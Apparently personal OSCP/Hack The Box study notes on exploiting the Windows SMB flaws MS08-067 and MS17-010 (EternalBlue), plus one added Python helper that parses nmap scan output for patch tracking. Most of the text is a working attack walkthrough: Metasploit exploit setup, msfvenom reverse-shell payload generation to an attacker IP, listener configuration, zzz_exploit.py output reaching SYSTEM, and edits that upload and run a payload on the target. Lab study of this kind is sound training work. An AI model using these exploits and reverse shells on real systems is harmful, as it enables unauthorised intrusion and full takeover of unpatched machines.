---------------------
nmap search and test:
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
> ls /usr/share/nmap/scripts/ | grep smb
.. smb-vuln-ms08-067.nse
> nmap --script vuln
> nmap --script smb-vuln $IP -Pn -p 445
> nmap --script smb-vuln* $IP -p 139,445
> nmap --script smb-vuln-ms08-067 $IP -Pn -p 445
> nmap --script smb-vuln-ms17-010 $IP -sV -p 445
Host script results (ms08-067):
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
Host script results (ms17-010):
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
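When the same scan runs across a whole subnet, the "Host script results" blocks above are what a patch tracker needs to ingest. The helper below is an added example, not part of these notes or of nmap: it parses smb-vuln-* blocks into script/state/CVE records; the sample input is constructed from the output above plus one assumed not-vulnerable one-liner.

```python
import re

# Constructed sample in nmap's "Host script results" layout: the two
# smb-vuln blocks from the notes plus one not-vulnerable one-liner.
SAMPLE_OUTPUT = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_smb-vuln-ms10-054: false
"""

SCRIPT_RE = re.compile(r"^\|[_ ]\s*(smb-vuln-[\w-]+):\s*(.*)$")
STATE_RE = re.compile(r"^\|\s+State:\s*(\S+)")
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")

def parse_smb_vuln(text):
    """Return one dict per smb-vuln-* script: {'script', 'state', 'cves'}.
    Multi-line results carry a 'State:' line; one-liners like '...: false'
    have no State line, so they are recorded as NOT VULNERABLE."""
    results, current = [], None
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:
            state = "NOT VULNERABLE" if m.group(2).strip().lower() == "false" else "UNKNOWN"
            current = {"script": m.group(1), "state": state, "cves": []}
            results.append(current)
            continue
        if current is None:          # header lines before the first script
            continue
        s = STATE_RE.match(line)
        if s:
            current["state"] = s.group(1)
        current["cves"].extend(CVE_RE.findall(line))
    return results

def vulnerable_cves(text):
    """Sorted CVE ids from scripts that reported State: VULNERABLE; this is
    the list a patch tracker or ticketing system should ingest."""
    return sorted(c for r in parse_smb_vuln(text)
                  if r["state"] == "VULNERABLE" for c in r["cves"])
```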
Eternal Checker
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
> python3 eternal_checker.py $IP
[*] Target OS: Windows 5.1
[!] The target is not patched .. Vulnerable!!!
Eternal Blue - Metasploit
> sudo msfconsole
> search ms08-067
> search ms17-010 ..better
set payload windows/x64/meterpreter/reverse_tcp
use ms08_067_netapi
use ms17_010_eternalblue ..better
set rhost $IP
set lhost $MyIP
show options
exploit
meterpreter > cd "C:\Documents and Settings\john\Desktop"
meterpreter > cat user.txt
Flag !!!
AutoBlue - Metasploit
Auto-merge - with Metasploit
-----------------------------------
Prep:
cd shellcode
./shell_prep.sh
Auto generate a reverse shell with msfvenom? (Y/n) Y
LHOST for reverse connection : 10.10.14.128
LPORT you want x64 to listen on: 4444
LPORT you want x86 to listen on: 6666
Type 0 for meterpreter shell 1 for regular cmd shell: 1
Type 0 staged payload or 1 for stageless payload : 0
Generating x64 cmd shell (staged)...
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=4444
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (staged)...
msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=6666
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
-----------------------------------
Listener:
> ../listener_prep.sh
LHOST for reverse connection : 10.10.14.128
LPORT for x64 reverse connection: 4444
LPORT for x86 reverse connection: 6666
Enter 0 for meterpreter shell or 1 for regular cmd shell: 1
Type 0 for staged payload or 1 for a stageless payload : 0
Metasploit Starts:
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
=[ metasploit v5.0.88-dev ]
+ -- --=[ 2014 exploits - 1097 auxiliary - 343 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.128
resource (config.rc)> set LPORT 4444
resource (config.rc)> set ExitOnSession false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:4444
resource (config.rc)> set LPORT 6666
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:6666
msf5 exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/shell/reverse_tcp tcp://10.10.14.128:4444
1 Exploit: multi/handler windows/shell/reverse_tcp tcp://10.10.14.128:6666
------------------------------------
Was there another command to run? (I don't remember)
Connected!
If you are lucky, this might work without a custom payload.
Needs a known/exposed named pipe and guest/anonymous access.
Ex: legacyHTB..worked blueHTB..failed
> python3 zzz_exploit.py $IP
[*] Target OS: Windows 5.1
[+] Found pipe 'browser' ..pipe was known
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820f3240
SESSION: 0xe10855a8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2148030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21480d0
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^)
[!] Executing interactive programs will hang shell!
C:\WINDOWS\system32>whoami ..system
Exploit7 - No MSF - Manual Merge
Create 32-bit and 64-bit payloads, then merge them.
This method skips the "Named Pipes" headache.
EXITFUNC=thread means less chance of a crash.
nasm -f bin ./shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp lport=443 lhost=$IP --platform windows -a x64 --format raw -o sc_x64_payload.bin EXITFUNC=thread
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
nasm -f bin ./shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp lport=443 lhost=$IP --platform windows -a x86 --format raw -o sc_x86_payload.bin EXITFUNC=thread
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
python3 ./shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
python3 eternalblue_exploit7.py $IP sc_all.bin
nc -nlvp 443
whoami ..system
AutoBlue - No MSF - zzz_exploit.py - Named Pipes
Custom Payload. No Metasploit.
zzz_exploit.py
Needs: mysmb.py
auxiliary/scanner/smb/pipe_auditor .. Not allowed on OSCP
pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] ..check the code for this!
Ex: blueHTB
Payload
msfvenom -p windows/shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > exploit.exe
vi zzz_exploit.py
USERNAME = '//' .. Anonymous authentication
PASSWORD = '' .. User/Pass if you have one
print('creating file c:\\exploit.exe on the target')
fid2 = smbConn.createFile(tid2, '/exploit.exe')
smb_send_file(smbConn, '/full/path/exploit.exe', 'C', '/exploit.exe')
service_exec(conn, r'cmd /c c:\exploit.exe')
nc -nvlp 4444
python zzz_exploit.py
python zzz_exploit.py <ip> [pipe_name]
python zzz_exploit.py 10.x.x.x .. pipe Problem
msfconsole .. not allowed for OSCP
search pipes .. get pipe_name
use 0
use auxiliary/scanner/smb/pipe_auditor
options
set rhosts 10.x.x.x
run
\samr \ntsvcs \lsass \netlogon \browser .. found Pipes
python zzz_exploit.py 10.x.x.x samr
nc -nvlp 4444
C:\WINDOWS\system32>whoami .. system